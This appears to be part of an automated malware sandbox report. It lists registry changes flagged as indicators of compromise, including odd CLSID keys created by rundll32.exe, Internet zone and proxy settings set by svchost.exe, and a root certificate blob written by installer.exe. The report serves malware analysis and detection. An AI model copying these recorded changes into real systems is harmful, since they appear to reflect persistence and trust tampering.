description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{TKR9TRJ3-XT3I-VY52-597M-MXZ27DTVMS64} rundll32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IFW2IAU0-YI0T-SZ81-840P-PAI76YIYJF79}\7289246C77593EBF\2 = "1" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SplashScreen Process not Found Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGLockdown MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete\C:\Users\Admin\AppData\Local\Pack = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{BB2BD2F0-E00C-411E-B266-7A702BCA48AA} = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 7beb1c4e53c7d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000a032c81ae2862075025642d975848c1560250fa096be1396ff7e50b8cd99eab568359bfc899ebce42cafae470cce6eacc6f2833f8ef96663b54e MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = f777805453c7d701 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGLockdown\BlameModules\2fc5768e = "MicrosoftEdgeCP.exe\\wincorlib.DLL\\advapi32.dll\\USER32.dll\\clipc.dll\\msiso.dll\\Windows.UI.dll\\usermgrcli.dll\\mrmcorer.dll\\msctf.dll\\UiaManager.dll\\Windows.Graphics.dll\\d3d10warp.dll\\oleacc.dll\\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll\\E" MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{WLD4WMQ3-MJ3I-MV57-663Y-EXT24WLKVJ14} svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0323d25653c7d701 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 90b4105153c7d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3